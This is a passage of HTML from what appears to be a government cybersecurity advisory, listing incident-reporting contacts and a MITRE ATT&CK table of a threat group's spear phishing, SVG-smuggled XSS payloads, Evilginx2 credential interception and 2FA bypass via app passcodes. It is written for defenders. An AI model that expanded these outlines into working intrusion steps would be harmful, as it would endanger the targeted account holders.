<li>Report significant cyber security incidents to <a href="https://ncsc.gov.uk/report-an-incident" target="_blank"><u>ncsc.gov.uk/report-an-incident</u></a> (monitored 24/7) </li>
</ul>
<p><strong>Estonia organizations </strong></p>
<ul>
<li>Estonian Foreign Intelligence Service (EFIS): <a href="mailto:info@valisluureamet.ee" target="_blank"><u>info@valisluureamet.ee</u></a> </li>
</ul>
<p><strong>Finnish organizations </strong></p>
<ul>
<li>Finnish Security and Intelligence Service: <a href="https://supo.fi/en/contact" target="_blank"><u>supo.fi/en/contact</u></a> </li>
</ul>
<p><strong>French organizations </strong></p>
<ul>
<li>French organizations are encouraged to report suspicious activity or incident related information found in this advisory by contacting ANSSI/CERT-FR at: <a href="mailto:cert-fr@ssi.gouv.fr" target="_blank"><u>cert-fr@ssi.gouv.fr</u></a> or by phone at: 3218 or +33 9 70 83 32 18. </li>
</ul>
<p><strong>Italian Organizations </strong></p>
<ul>
<li>Italian External Intelligence and Security Agency (AISE):  <br>Visit <a href="https://www.sicurezzanazionale.gov.it/" target="_blank"><u>https://www.sicurezzanazionale.gov.it/</u></a>  </li>
<li>Italian Internal Intelligence and Security Agency (AISI):  <br>Visit <a href="https://www.sicurezzanazionale.gov.it/" target="_blank"><u>https://www.sicurezzanazionale.gov.it/</u></a> </li>
</ul>
<div class="OutlineElement Ltr SCXW214395380 BCX8">
<p><strong>Moldovan organizations </strong></p>
</div>
<div class="ListContainerWrapper SCXW214395380 BCX8">
<ul type="disc">
<li>Security and Intelligence Service of the Republic of Moldova (SIS RM): <a href="mailto:cybersec@sis.md" target="_blank"><u>cybersec@sis.md</u></a> </li>
</ul>
</div>
<p><strong>Polish organizations </strong></p>
<ul>
<li>Polish Foreign Intelligence Agency (AW): <a href="mailto:ctiteam@aw.gov.pl" target="_blank"><u>ctiteam@aw.gov.pl</u></a></li>
</ul>
</div>
</div>
<h2><strong>Appendix A: MITRE ATT&amp;CK tactics and techniques</strong><a class="ck-anchor"></a></h2>
<p>See <a href="https://www.cisa.gov/#table9"><strong>Table 9</strong></a> through <a href="https://www.cisa.gov/#table19"><strong>Table 19</strong></a> for all the threat actor tactics and techniques referenced in this advisory.<a class="ck-anchor"></a></p>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 9: Reconnaissance </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Gather Victim Identity Information: Credentials </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1589/001/" target="_blank"><u>T1589.001</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The payload attempts to intercept a victim’s password from their password manager. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Gather Victim Identity Information: Email Addresses </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1589/002/" target="_blank"><u>T1589.002</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The payload attempts to grab the victim’s email address from various data stores. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Search Open Websites/Domains </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1593/" target="_blank"><u>T1593</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>This group likely leverages public information to support target development. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Active Scanning </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1595/" target="_blank"><u>T1595</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Port scanning can be used by this group to assist with determining exploitability of identified targets. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Search Open Technical Databases: Scan Databases </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1596/005/" target="_blank"><u>T1596.005</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Various public datasets can provide information to support discovery of exploitable targets. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Search Closed Sources </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1597/" target="_blank"><u>T1597</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Previously exfiltrated data can be used to enhance target development efforts. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Search Closed Sources: Purchase Technical Data </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1597/002/" target="_blank"><u>T1597.002</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Commercial datasets can also be used to support target development efforts. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<div class="WACAltTextDescribedBy SCXW76044448 BCX8"><a class="ck-anchor"></a></div>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 10: Resource Development </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Acquire Infrastructure </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1583/" target="_blank"><u>T1583</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>This group used Mullvad VPN to anonymize traffic sent to operational infrastructure. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Acquire Infrastructure: Virtual Private Server </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1583/003/" target="_blank"><u>T1583.003</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>This group procured VPS servers from a variety of vendors. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Develop Capabilities </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1587/" target="_blank"><u>T1587</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The <em>Ulej</em> capability was developed likely for use by this group to conduct spear phishing campaigns. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Develop Capabilities: Malware </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1587/001/" target="_blank"><u>T1587.001</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Development of a novel payload that steals a victim’s emails and other sensitive account information. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Develop Capabilities: Exploits </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1587/004/" target="_blank"><u>T1587.004</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Development of a novel, at the time, cross-site-scripting (XSS) exploit that enables execution of arbitrary JavaScript. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Obtain Capabilities: Tool </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1588/002/" target="_blank"><u>T1588.002</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Open source tools, such as Evilginx2, have also been used by the group. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Obtain Capabilities: Artificial Intelligence </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1588/007/" target="_blank"><u>T1588.007</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The group appears to have leveraged AI to support development efforts. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Stage Capabilities </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1608/" target="_blank"><u>T1608</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Flowerbed is deployed to a procured server in the cloud. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 11: Initial Access </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Valid Accounts </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1078/" target="_blank"><u>T1078</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>This actor has used commercial datasets to acquire account credentials and gain unauthorized access to accounts. Additionally, this actor is believed to use previously compromised accounts to conduct spear phishing.  </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Trusted Relationship </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1199/" target="_blank"><u>T1199</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The group sends malicious payloads to targeted individuals using previously compromised accounts that might have an established relationship with the target.  </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Phishing </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1566/" target="_blank"><u>T1566</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The actors used spear phishing to lure users into opening malicious email. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 12: Execution </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Exploitation for Client Execution </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1203/" target="_blank"><u>T1203</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>An XSS vulnerability was leveraged to execute the JavaScript payload. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 13: Persistence </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Account Manipulation </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1098/" target="_blank"><u>T1098</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Enabling IMAP and Application Passcodes provides persistent access to the compromised account. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Modify Authentication Process: Multi-Factor Authentication </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1556/006/" target="_blank"><u>T1556.006</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Creating Application Passcodes to bypass 2FA and stealing a user’s “Scratch Keys,” which can be used in place of a 2FA token. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 14: Privilege Escalation </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Valid Accounts </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1078/" target="_blank"><u>T1078</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>This actor has used commercial datasets to acquire account credentials and gain unauthorized privileged access to accounts.  </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p><a class="ck-anchor"></a></p>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 15: Stealth </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Obfuscated Files or Information: Command Obfuscation </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1027/010/" target="_blank"><u>T1027.010</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Obfuscated JavaScript payload sent to targets to exploit the XSS vulnerability. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Obfuscated Files or Information: Encrypted/Encoded File </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1027/013/" target="_blank"><u>T1027.013</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The JavaScript payload included both a Base64-encoded and XOR-encrypted inner payload. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Obfuscated Files or Information: SVG Smuggling </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1027/017/" target="_blank"><u>T1027.017</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The payload was contained in an “onload” attribute within an SVG image included in the malicious email. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Use Alternate Authentication Material: Web Session Cookie </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1550/004/" target="_blank"><u>T1550.004</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Previous campaigns using AiTM leveraged stealing and use of a victim’s session cookies to authenticate. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 16: Credential Access </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Modify Authentication Process: Multi-Factor Authentication </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1556/006/" target="_blank"><u>T1556.006</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Creating Application Passcodes to bypass 2FA and stealing a user’s “Scratch Keys,” which can be used in place of a 2FA token. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Adversary-in-the-Middle </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1557/" target="_blank"><u>T1557</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Previous campaigns used Evilginx2 as an AiTM toolkit to intercept credentials and session cookies. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p><a class="ck-anchor"></a></p>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 17: Collection </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Data Staged: Remote Data Staging </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
